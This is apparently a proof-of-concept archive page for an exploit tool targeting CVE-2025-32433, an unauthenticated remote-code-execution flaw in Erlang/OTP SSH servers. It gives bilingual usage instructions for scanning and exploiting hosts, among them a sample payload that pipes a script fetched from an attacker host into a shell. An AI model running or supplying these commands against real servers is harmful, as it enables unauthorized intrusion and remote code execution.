关联漏洞
描述
Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling
介绍
## VIETNAMESE ##
- ## Cách sử dụng ##
- Quét một IP:
>python3 elaina_cve2025_32433.py --target 192.168.1.10
- Quét nhiều IP từ file:
>python3 elaina_cve2025_32433.py --file targets.txt
- Khai thác nếu phát hiện lỗ hổng:
>python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit
- Tùy chọn payload:
>python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit --payload "curl http://attacker:9001/shell.sh | sh"
- Xuất ra JSON:
>python3 elaina_cve2025_32433.py --file targets.txt --json-output scan_result.json
## ENGLISH ##
- ## How to use ##
- Scan single IP:
python3 elaina_cve2025_32433.py --target 192.168.1.10
- Scan multiple IPs from file:
>python3 elaina_cve2025_32433.py --file targets.txt
- Exploit if vulnerability is found:
>python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit
- Payload options:
>python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit --payload "curl http://attacker:9001/shell.sh | sh"
- Output to JSON:
>python3 elaina_cve2025_32433.py --file targets.txt --json-output scan_result.json
文件快照
[4.0K] /data/pocs/06d329b4c7e7cfe1e6f90a1bb01548666fb849b8
├── [3.1K] elaina_cve2025_32433.py
└── [1.1K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。